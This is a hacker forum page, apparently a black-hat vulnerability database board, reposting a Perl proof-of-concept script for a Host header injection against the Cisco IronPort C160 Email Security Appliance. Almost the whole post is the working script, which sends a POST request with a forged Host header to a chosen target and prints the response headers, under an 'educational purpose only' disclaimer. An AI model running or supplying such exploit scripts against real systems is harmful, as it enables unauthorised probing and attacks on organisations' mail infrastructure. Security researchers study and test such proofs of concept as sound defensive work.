跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Cisco Email Security Appliance (IronPort) C160 - 'Host' Header Injection

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
#!/usr/bin/perl -w
#
#
#  Cisco (Titsco) Email Security Appliance (IronPort) C160 Header 'Host' Injection
#
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
# 
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTTP::CookieJar::LWP;


my $host = shift || 'https://192.168.1.1:443/';

print ("[+] Cisco (Titsco) Email Security Appliance (IronPort) C160 Header 'Host' Injection\n");
print ("===================================================================================\n");
print ("[!] Author: Todor Donev <todor.donev\@gmail.com>\n");
print ("[?] e.g. perl $0 https://target:port/\n") and exit if ($host !~ m/^http/);

my $user_agent = rand_ua("browsers");
my $jar = HTTP::CookieJar::LWP->new();
my $browser  = LWP::UserAgent->new(
                                        protocols_allowed => ['http', 'https'],
                                        ssl_opts => { verify_hostname => 0 }
                                );
   $browser->timeout(10);
   $browser->cookie_jar($jar);
   $browser->agent($user_agent);

my $request = HTTP::Request->new (POST => $host,
                                  [ Content_Type => "application/x-www-form-urlencoded" ,
                                    Referer => $host], " ");
$request->header("Host" => "Header-Injection");
my $content = $browser->request($request);
print $content->headers_as_string();

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。